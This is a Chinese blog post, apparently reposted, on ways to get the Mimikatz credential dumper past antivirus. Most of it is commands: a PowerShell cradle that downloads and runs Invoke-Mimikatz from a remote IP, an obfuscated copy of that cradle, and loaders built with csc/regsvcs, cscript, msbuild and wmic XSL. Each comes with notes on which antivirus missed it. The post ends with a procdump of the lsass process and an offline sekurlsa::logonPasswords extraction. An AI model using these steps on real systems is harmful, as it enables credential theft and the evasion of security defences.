Mimikatz绕过的方式

admin 2022年1月6日01:48:44评论122 views字数 3262阅读10分52秒阅读模式

Mimikatz介绍

Mimikatz是一款能够从Windows认证(LSASS)的进程中获取内存,并且获取明文密码和NTLM哈希值的神器,内网渗透中常用mimikatz获取明文密码或者获取hash值来漫游内网。但是在实际的运用中,常常会遇到杀软的拦截,所以这里我借鉴网上的资料,进行复现学习,达到免杀绕过的目的。有些方式没有复现成功我就没有写出来了,有一些成功之后似乎也会被拦截了。

姿势一:powershell

1
https://github.com/PowerShellMafia/PowerSploit/raw/master/Exfiltration/Invoke-Mimikatz.ps1

cmd下执行,360没有拦截

1
powershell -exec bypass "import-module .\Invoke-Mimikatz.ps1;Invoke-Mimikatz"

Mimikatz绕过的方式
powershell运行会被拦截

1
powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://192.168.30.139/Invoke-Mimikatz.ps1');Invoke-Mimikatz

简单混淆还是被拦截了

1
powershell -c " ('IEX '+'(Ne'+'w-O'+'bject Ne'+'t.W'+'ebClien'+'t).Do'+'wnloadS'+'trin'+'g'+'('+'1vchttp://'+'192.168.30'+'.139/'+'Inv'+'oke-Mimik'+'a'+'tz.'+'ps11v'+'c)'+';'+'I'+'nvoke-Mimika'+'tz').REplaCE('1vc',[STRing][CHAR]39)|IeX"

img

姿势二:使用.net2.0免杀mimikatz

首先下载katz.cs,并放在对应的系统版本的Framework目录中

1
2
3
4
5
32位:C:\Windows\Microsoft.NET\Framework\v2.0.50727



64位:C:\Windows\Microsoft.NET\Framework64\v2.0.50727

然后在powershell中执行命令生成key.snk

1
2
3
4
5
6
7
8
9
$key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4='



$Content = [System.Convert]::FromBase64String($key)



Set-Content key.snk -Value $Content -Encoding Byte

Mimikatz绕过的方式
最后生成mimikatz,再运行

32位:

1
C:\Windows\Microsoft.NET\Framework\v2.0.50727>.\csc.exe /r:System.EnterpriseServices.dll /out:katz.exe /keyfile:key.snk /unsafe katz.cs C:\Windows\Microsoft.NET\Framework\v2.0.50727>.\regsvcs.exe katz.exe

64位:

1
C:\Windows\Microsoft.NET\Framework64\v2.0.50727>.\csc.exe /r:System.EnterpriseServices.dll /out:katz.exe /keyfile:key.snk /unsafe katz.cs C:\Windows\Microsoft.NET\Framework64\v2.0.50727>.\regsvcs.exe katz.exe

Mimikatz绕过的方式
很不幸,又被360发现了
Mimikatz绕过的方式
然而,火绒又过了,没有一点提示
img

姿势三:js加载mimikatz

下载katz.js,执行

1
cscript mimikatz.js

Mimikatz绕过的方式
360拦截,但是火绒过了,没有反应
img

姿势四:.net4.0加载mimikatz

下载[mimikatz.xml](https://raw.githubusercontent.com/3gstudent/msbuild-inline-task/master/executes mimikatz.xml),执行

1
2
3
4
5
cd C:\Windows\Microsoft.NET\Framework64\v4.0.30319



msbuild.exe mimikatz.xml

过360,并没有拦截
Mimikatz绕过的方式火绒同样没报
img

姿势五:Jscript的xsl版

下载mimikatz.xsl

本地加载

1
wmic os get /format:"mimikatz.xsl"

360、火绒都没有拦截
img

姿势六:导出lsass进程离线读取密码

mimikatz+procdump

下载prodump,管理员权限运行

1
procdump64.exe -accepteula -ma lsass.exe 1.dmp

img

也可以在任务管理器中导出文件
Mimikatz绕过的方式
然后把dmp文件导出到本地使用mimikatz读取密码

1
mz64.exe "sekurlsa::minidump 1.dmp" "sekurlsa::logonPasswords full" exit

Mimikatz绕过的方式
这里需要注意的是win10下的密码抓取方式是不太一样的,具体看另一篇文章:Windows10明文密码抓取。
而win7下拿到dmp文件后,是直接可以导出读取明文密码的。
img

FROM :b0urne.top | Author:b0urne

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月6日01:48:44
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Mimikatz绕过的方式http://cn-sec.com/archives/722785.html

发表评论

匿名网友 填写信息